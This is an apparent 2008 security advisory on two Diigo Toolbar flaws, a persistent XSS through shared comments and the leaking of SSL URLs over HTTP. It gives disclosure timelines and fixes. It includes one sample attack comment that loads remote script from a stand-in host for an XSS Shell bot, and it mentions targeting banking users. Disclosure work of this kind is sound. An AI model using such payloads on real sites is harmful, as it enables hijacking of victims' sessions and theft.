|
|
|
|
| |
| Diigo is "a social bookmarking and sharing application which allows users to see other users comments and notes for every website. For this feature users should use Diigolet bookmarklet or Diigo Toolbar. These are almost mandatory to use Diigo and almost all Diigo members have them installed". Two security vulnerabilities have been discovered in Diigo Toolbar, one of these vulnerabilities allows a remote attackers to insert arbitrary Javascript into the context of the Diigo Toolbar, which will continue on being executed even if the user leaves the attacker's web site, while the other allows leakage of sensitive information between unrelated websites. |
| |
Credit:
The information has been provided by Ferruh Mavituna.
The original article can be found at: http://ferruh.mavituna.com
|
| |
Global XSS
An attacker can do Cross-site Scripting in these public comments and that comment will affect any other user of Diigo Toolbar and Diigolet who visits the website. This means a Diigo user can backdoor any website in the internet easily with a permanent XSS and any other Diigo user who visits this website will be affected. Vulnerability exists in:
* Diigo Toolbar for IE,
* Diigo Toolbar for FF,
* Diigolet for IE and FF
Comments can be used to inject arbitrary data into the user's current domain context, thus an attacker can execute a Javascript code in the target domain, Target URL can be over SSL as well. All Diigo tools users are affected from this vulnerability.
For an attacker this is a perfect opportunity to use some XSS bot manager application such as XSS Shell, Also an attacker can attack high profile websites such as online banking applications. Considering you can search in shared bookmarks so you can actually people who uses a certain online banking application.
Sample attack comment can be:
<script src="http://example.com/xssshell/"></script>
Fix:
Download latest version of Diigo Toolbar
Disclosure Timeline:
* 12 May 2008 - Vendor Informed
* 2 June 2008 - Another e-mail to vendor to check if they've fixed
* 3 June 2008 - Vendor informed me that it's fixed
* 20 June 2008 - Public Release
Information Leakage in SSL URLs:
Diigo toolbar is sending all SSL URLs to their servers over HTTP for shared comment feature, which might cause to leak session_ids over URL or any other sensitive information transferred over URL.
Fix:
User can not opt-out from this feature. There is no known fix, this
looks like considered as a feature not a bug.
Disclosure Timeline:
* 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried
to explain why this is bad, it didn't work.
* 12 May 2008 - Ask for an update, No response.
* 20 June 2008 - Public Release
|
|
|
|
|
|
|
